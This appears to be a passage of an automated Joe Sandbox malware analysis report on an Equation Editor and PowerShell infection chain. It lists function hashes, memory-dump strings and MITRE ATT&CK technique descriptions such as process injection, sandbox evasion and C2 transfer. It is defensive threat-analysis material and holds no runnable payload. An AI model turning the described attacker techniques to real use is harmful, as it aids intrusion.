Opcode ID: 48681b26aa219888c69ed59e00b65a126c00e672da5ef575e8c21e86f2352990
Instruction ID: bcbf81cd7847ac7c39e781eeb49ba3d887a56147957e928febd8173526399f5d
Opcode Fuzzy Hash: 48681b26aa219888c69ed59e00b65a126c00e672da5ef575e8c21e86f2352990
Instruction Fuzzy Hash: B111FDA284D7C21FDB1783305D7A610BF653A67104B9D86CEC0C60A8E3E399A1A2C797

Function 035106BB Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000), ref: 035106C0

Memory Dump Source

Source File: 00000002.00000002.346271165.0000000003510000.00000004.00000020.00020000.00000000.sdmp, Offset: 03510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3510000_EQNEDT32.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
Instruction Fuzzy Hash:

Function 035106C2 Relevance: .0, Instructions: 14
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.346271165.0000000003510000.00000004.00000020.00020000.00000000.sdmp, Offset: 03510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3510000_EQNEDT32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
Instruction ID: d0353fc7b652820521e765d69c763c276089ef88af9379dc4a9f38fbc61b105a
Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
Instruction Fuzzy Hash: FCD01C352226028BE204DB04D980A1AF36AFBE8210B28C268E0004B669C330E8E2CAD0

Non-executed Functions

Function 0351050A Relevance: 1.6, APIs: 1, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(035104F8), ref: 0351050A

Memory Dump Source

Source File: 00000002.00000002.346271165.0000000003510000.00000004.00000020.00020000.00000000.sdmp, Offset: 03510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3510000_EQNEDT32.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 12cf264c11133a006bfa609b62c23bcac22e4182928f15dc94cf98a0fa50bc11
Instruction ID: 2a3e6e06bbd928a624a1fca9cc6ee55bbd05f51d6e7a383609d0598ee66e16fb
Opcode Fuzzy Hash: 12cf264c11133a006bfa609b62c23bcac22e4182928f15dc94cf98a0fa50bc11
Instruction Fuzzy Hash: 1121BB9980E7C10FE302D230AAAA101FF607A1300471E86CEC4C60F4F7E79595A6D396

Analysis Process: powershell.exePID: 3200, Parent PID: 3140COMMON

Executed Functions

Function 004C1A50 Relevance: 26.9, Strings: 21, Instructions: 602COMMON

Download Yara Rule

Strings

0;J, xrefs: 004C1AC8
$p, xrefs: 004C200B
tPp, xrefs: 004C1D2A
0;J, xrefs: 004C1B2D
$p, xrefs: 004C1B0E
$p, xrefs: 004C2029
$p, xrefs: 004C201D
8#@f, xrefs: 004C21AA
$p, xrefs: 004C1FE3
[Bf, xrefs: 004C1D66
8#@f, xrefs: 004C21B8
[Bf, xrefs: 004C1D74
4'p, xrefs: 004C1E93
4'p, xrefs: 004C1E87
$p, xrefs: 004C1FC7
$p, xrefs: 004C1B70
tPp, xrefs: 004C1D1E
4'p, xrefs: 004C1B8B
$p, xrefs: 004C1B64
$p, xrefs: 004C1FFF
4'p, xrefs: 004C1B97

Memory Dump Source

Source File: 00000006.00000002.358380934.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_powershell.jbxd

Similarity

API ID:
String ID: 0;J$0;J$4'p$4'p$4'p$4'p$8#@f$8#@f$tPp$tPp$$p$$p$$p$$p$$p$$p$$p$$p$$p$[Bf$[Bf
API String ID: 0-27351058
Opcode ID: 77e7fde0f59e3aa324c0bb88709ba0676825540a159975a5d8835bf3df287f9f
Instruction ID: 500b4133a2baa2fb912d447f691ae716602f5a941fe65b5e1341065653607ae0
Opcode Fuzzy Hash: 77e7fde0f59e3aa324c0bb88709ba0676825540a159975a5d8835bf3df287f9f
Instruction Fuzzy Hash: 131238397043009FDBA59A298850F7BBBE1AFC6310F28846FD545CB362DA79DC42C766

Function 004C0E48 Relevance: 5.2, Strings: 4, Instructions: 200COMMON

Download Yara Rule

Strings

x;J, xrefs: 004C0F8B
tPp, xrefs: 004C0EDA
89J, xrefs: 004C0EB4
tPp, xrefs: 004C0ECE

Memory Dump Source

Source File: 00000006.00000002.358380934.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_powershell.jbxd

Similarity

API ID:
String ID: 89J$tPp$tPp$x;J
API String ID: 0-1455956576
Opcode ID: d7892d7b194512c2e819246e753e48976fb11569ff95e3aa82f232dfc7957a7b
Instruction ID: 78a4c4c07b119f1f6e31e3f0671e3ea4d51fdc2ab29e2e7654899b220c97111f
Opcode Fuzzy Hash: d7892d7b194512c2e819246e753e48976fb11569ff95e3aa82f232dfc7957a7b
Instruction Fuzzy Hash: 6261D535604210DFC7649A69C851F6ABBA2EFC6310F24846FE548DB392CA76DC82C795

Function 00312C80 Relevance: .6, Instructions: 618COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.358308302.0000000000310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_310000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6e13c21541d1d3af39680109f712e19660714562c1d42c59975857716887b86
Instruction ID: ac132d0eea5b7d3aea1c1e98d3d37ae4e61971f2b8c3e7f95c2b6615b22f972f
Opcode Fuzzy Hash: f6e13c21541d1d3af39680109f712e19660714562c1d42c59975857716887b86
Instruction Fuzzy Hash: 18425070A053889FCB0ACF68D894ADDBFF1AF49314F19849AE454AB362C734DD86CB51

Function 00313189 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.358308302.0000000000310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_310000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5f3dffe8ce4400c7aa73813f8e1ad35c14ea58a92f977f6a720824041a49327
Instruction ID: 885096aa7ecaaa6d715e30446688a19c2348ab984e0fc4f3a1d21ea4a3b6717d
Opcode Fuzzy Hash: b5f3dffe8ce4400c7aa73813f8e1ad35c14ea58a92f977f6a720824041a49327
Instruction Fuzzy Hash: E5510874A00209AFDB05DBA8D484AEDFBF2BF88314F28C559E404AB355C735ED86CB90

Function 00313B08 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.358308302.0000000000310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_310000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cc6806b635d6fb016013bd42ad8e1457c843a7fe0b6f7547f2befd7ad79233f
Instruction ID: 37bb3f2964bf3d4202111168bf2ebbe0dcfd7d0914e5b9a7133933505a09ffaa
Opcode Fuzzy Hash: 2cc6806b635d6fb016013bd42ad8e1457c843a7fe0b6f7547f2befd7ad79233f
Instruction Fuzzy Hash: 96312A75A042059FCB09CF5CC4809AAFBF1FF89310B658299E914E7755D731ED91CB90

Function 004C1081 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.358380934.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b21b76687fcb0d8aea5906804e6d49714280088361a61990d72d3b8b77ec9e7
Instruction ID: 59bd28f4581bb9d2818b6e633aaf381c511ff118d2e55dd60819a008715d02a0
Opcode Fuzzy Hash: 7b21b76687fcb0d8aea5906804e6d49714280088361a61990d72d3b8b77ec9e7
Instruction Fuzzy Hash: 001121603083846FC7551A754829B6B7EA59F87700F1988AFF540DF2D3CAA98C858366

Function 0031329A Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.358308302.0000000000310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_310000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63190f1f386d4527d3335e2a8a40042d221dd82d56e72d32c479320f434f59d1
Instruction ID: 30356bd871ff02274de6727212afdba5dc087582215fcf4b073a72856d4f0d23
Opcode Fuzzy Hash: 63190f1f386d4527d3335e2a8a40042d221dd82d56e72d32c479320f434f59d1
Instruction Fuzzy Hash: 98111974A00208AFDB05DBA8D484FDDBBF5AF48314F24C859E404AB351C775ED86CB50

Function 001DD01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.358265398.00000000001DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1dd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 703a38e28a6c25ee79ba82a1161c2ead5efe6f50c324415215b6e6fc4a62f76c
Instruction ID: 5cd79eca3bad77c44f2ab4d8031e5629565540a1e4cbf6b34546547477cc7170
Opcode Fuzzy Hash: 703a38e28a6c25ee79ba82a1161c2ead5efe6f50c324415215b6e6fc4a62f76c
Instruction Fuzzy Hash: E501DF71504340ABE7204E29EC84B66BF98EF81324F28845BFC484A386C7799845CAB1

Function 001DD006 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.358265398.00000000001DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1dd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 036e54bc4e32febdacd51ff0f57ad126624da0e6d9af92cffbc33c2c03ea42c5
Instruction ID: c4e633fff72db57db94713e3665d56a326979c1ecd8f4ae64f87de7371cfb80e
Opcode Fuzzy Hash: 036e54bc4e32febdacd51ff0f57ad126624da0e6d9af92cffbc33c2c03ea42c5
Instruction Fuzzy Hash: CF01526140D3C05FD7124B259C94B62BFA4DF53224F1981DBE8848F297C2699C48C772

Function 004C10A8 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.358380934.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81c359f42d2d92fc8b399b71484b8e5ccc709f843f58b16741a0ed944baf6c72
Instruction ID: b2363364f4fb37fc781c751c8fa4a8cd3fda4b8dcb997946c1111f3988ee5d99
Opcode Fuzzy Hash: 81c359f42d2d92fc8b399b71484b8e5ccc709f843f58b16741a0ed944baf6c72
Instruction Fuzzy Hash: 08F0287074020837C6642AA54805F7F689ADFD9700F10841DF905AF3C1DDF69C424365

Non-executed Functions

Function 004C1318 Relevance: 22.9, Strings: 18, Instructions: 382COMMON

Download Yara Rule

Strings

4'p, xrefs: 004C1447
8#@f, xrefs: 004C177D
8#@f, xrefs: 004C1578
8#@f, xrefs: 004C176F
8#@f, xrefs: 004C156E
8#@f, xrefs: 004C15BB
9J, xrefs: 004C13CB
$p, xrefs: 004C16AE
h%Bf, xrefs: 004C14D1
$p, xrefs: 004C1686
h%Bf, xrefs: 004C14C3
9J, xrefs: 004C13EE
8#@f, xrefs: 004C15B1
4:J, xrefs: 004C16F3
$p, xrefs: 004C1531
4'p, xrefs: 004C143B
$p, xrefs: 004C16A2
4:J, xrefs: 004C1710

Memory Dump Source

Source File: 00000006.00000002.358380934.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'p$4'p$4:J$4:J$8#@f$8#@f$8#@f$8#@f$8#@f$8#@f$h%Bf$h%Bf$$p$$p$$p$$p$9J$9J
API String ID: 0-1002509357
Opcode ID: 001b20e0ef4d9cd270e48360e33f4de52e6e74bc6e4803b5d0aac20d48f14937
Instruction ID: 89df7df98dd19922584051d6bf9d8030dfeca1d0c61086d50c6ea3e53734b17e
Opcode Fuzzy Hash: 001b20e0ef4d9cd270e48360e33f4de52e6e74bc6e4803b5d0aac20d48f14937
Instruction Fuzzy Hash: 5BC1E539B002109FD7589B68D450F6BBBE2AFC6310B28807FD945CB362DA39CD42C795

Function 004C00A0 Relevance: 20.4, Strings: 16, Instructions: 413COMMON

Download Yara Rule

Strings

`8J, xrefs: 004C0240
4'p, xrefs: 004C0597
L4p, xrefs: 004C03B0
L4p, xrefs: 004C0419
`8J, xrefs: 004C0189
$p, xrefs: 004C056A
$p, xrefs: 004C0576
L4p, xrefs: 004C0160
L4p, xrefs: 004C01BE
x, xrefs: 004C04EB
(, xrefs: 004C047D
x, xrefs: 004C04DD
`8J, xrefs: 004C011B
L4p, xrefs: 004C01C9
L4p, xrefs: 004C040E
4'p, xrefs: 004C058B

Memory Dump Source

Source File: 00000006.00000002.358380934.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_powershell.jbxd

Similarity

API ID:
String ID: ($4'p$4'p$L4p$L4p$L4p$L4p$L4p$L4p$`8J$`8J$`8J$x$x$$p$$p
API String ID: 0-2840146388
Opcode ID: 66a9072794c47d0963f9b862aad9b8cab84262ba5dfedc7714ce25fb7cbd1aac
Instruction ID: 9408e3a18492ea58355d79891146f594e40419787495cfa1dc906928beda2c15
Opcode Fuzzy Hash: 66a9072794c47d0963f9b862aad9b8cab84262ba5dfedc7714ce25fb7cbd1aac
Instruction Fuzzy Hash: 1ED12839700204DFDB699E68D854B6F7BA2ABC4300F18847FE9419B391CB79CD42C796

Function 004C05C8 Relevance: 10.2, Strings: 8, Instructions: 229COMMON

Download Yara Rule

Strings

$p, xrefs: 004C08A6
\9J, xrefs: 004C0643
$p, xrefs: 004C08B2
L4p, xrefs: 004C0688
L4p, xrefs: 004C06F1
L4p, xrefs: 004C06E6
\9J, xrefs: 004C0768
\9J, xrefs: 004C06B1

Memory Dump Source

Source File: 00000006.00000002.358380934.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_powershell.jbxd

Similarity

API ID:
String ID: L4p$L4p$L4p$\9J$\9J$\9J$$p$$p
API String ID: 0-1096752444
Opcode ID: dd321d84ad1c0bd0c791deff499c06e5cbcf8d9ef7cd222875d33c44c4dfa553
Instruction ID: c340348f8e35df77fa379bc4e155630748a1b1fa3a673662278f64b7ece70e14
Opcode Fuzzy Hash: dd321d84ad1c0bd0c791deff499c06e5cbcf8d9ef7cd222875d33c44c4dfa553
Instruction Fuzzy Hash: 34712939701204DFDB599E68D850BAF7BA2AFC0300F14846BE9158B391DB79DD42CBA6

Function 004C0002 Relevance: 7.6, Strings: 6, Instructions: 145COMMON

Download Yara Rule

Strings

<8J, xrefs: 004C004F
L4p, xrefs: 004C0160
L4p, xrefs: 004C01BE
`8J, xrefs: 004C011B
L4p, xrefs: 004C01C9
`8J, xrefs: 004C0189

Memory Dump Source

Source File: 00000006.00000002.358380934.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_powershell.jbxd

Similarity

API ID:
String ID: <8J$L4p$L4p$L4p$`8J$`8J
API String ID: 0-2160452193
Opcode ID: a3b4c106e8fc474f27e6c2a0135f85a08335bb989e832b3cc971b2e3137c5afa
Instruction ID: 398387af2d67ae94a8d463bb6c164dc95252d5501ce58fd011df2727c82e3a6d
Opcode Fuzzy Hash: a3b4c106e8fc474f27e6c2a0135f85a08335bb989e832b3cc971b2e3137c5afa
Instruction Fuzzy Hash: 25510879A04384DFDB568B14D814B6A7BA2AF41300F1E80ABD8409B3E2CB7DCD45CB56

Function 004C1254 Relevance: 5.1, Strings: 4, Instructions: 136COMMON

Download Yara Rule

Strings

9J, xrefs: 004C13EE
9J, xrefs: 004C13CB
51, xrefs: 004C12EB
4'p, xrefs: 004C143B

Memory Dump Source

Source File: 00000006.00000002.358380934.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'p$51$9J$9J
API String ID: 0-3616965108
Opcode ID: ef0d844d3533d3a6e7a305474770bc235bc9941b78303a2c7ccecceb06ee6c9f
Instruction ID: e57a30f45f77579009025ba9014f20585a21995924c84a936f133f0d8ff2fe29
Opcode Fuzzy Hash: ef0d844d3533d3a6e7a305474770bc235bc9941b78303a2c7ccecceb06ee6c9f
Instruction Fuzzy Hash: 4941C338A042808FD769CB289450F66BBB1AF97314B1980AFD9058F373D739DC46C75A

Function 004C17C8 Relevance: 5.1, Strings: 4, Instructions: 97COMMON

Download Yara Rule

Strings

X:J, xrefs: 004C180F
4'p, xrefs: 004C1865
X:J, xrefs: 004C182C
4'p, xrefs: 004C1875

Memory Dump Source

Source File: 00000006.00000002.358380934.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'p$4'p$X:J$X:J
API String ID: 0-2228261933
Opcode ID: 67a234f17c5eac8755d1669bb3f5c3371028f98ce003f396fcb8491bd74be996
Instruction ID: 02844250bad90422626b39ff282cc63d8dc9e584f0c11f174390ff641288dab9
Opcode Fuzzy Hash: 67a234f17c5eac8755d1669bb3f5c3371028f98ce003f396fcb8491bd74be996
Instruction Fuzzy Hash: 1A212D34704300ABDB68AA6D8450F7B7A97AFD6311F64803EE9498B391CE75CC42C365

Function 004C1F5C Relevance: 5.1, Strings: 4, Instructions: 79COMMON

Download Yara Rule

Strings

$p, xrefs: 004C1FC7
$p, xrefs: 004C201D
$p, xrefs: 004C1FE3
$p, xrefs: 004C1FFF

Memory Dump Source

Source File: 00000006.00000002.358380934.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_powershell.jbxd

Similarity

API ID:
String ID: $p$$p$$p$$p
API String ID: 0-3121760203
Opcode ID: a7a5b7a2ab6e2a712d315406d37bce45ce95a7242e1dabfa8a16ab8b6b17689d
Instruction ID: be70e8fc16a96cc62df6c7cd8be6d293120648f75c6e7c526695969213fe14da
Opcode Fuzzy Hash: a7a5b7a2ab6e2a712d315406d37bce45ce95a7242e1dabfa8a16ab8b6b17689d
Instruction Fuzzy Hash: 9921F4399043019FDBB18E158A40F7BBBB0AF95311F28416FD95487262D7F98845C75A

Function 004C1F70 Relevance: 5.1, Strings: 4, Instructions: 71COMMON

Download Yara Rule

Strings

$p, xrefs: 004C1FC7
$p, xrefs: 004C201D
$p, xrefs: 004C1FE3
$p, xrefs: 004C1FFF

Memory Dump Source

Source File: 00000006.00000002.358380934.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_powershell.jbxd

Similarity

API ID:
String ID: $p$$p$$p$$p
API String ID: 0-3121760203
Opcode ID: 5167e874d036c5137a30268e1db6c95ac57e221b17d02649ec5ba952754ec667
Instruction ID: 11920d1928a9e1a22e8d067ef4054bda5f8ab3977e1fd08d458a6598122db64a
Opcode Fuzzy Hash: 5167e874d036c5137a30268e1db6c95ac57e221b17d02649ec5ba952754ec667
Instruction Fuzzy Hash: E721A439A003059FDBB08E16C640F7BBBE4AB95311F68412FD91497322D7F9C841C75A

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ( Security Software Discovery ) to evade.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

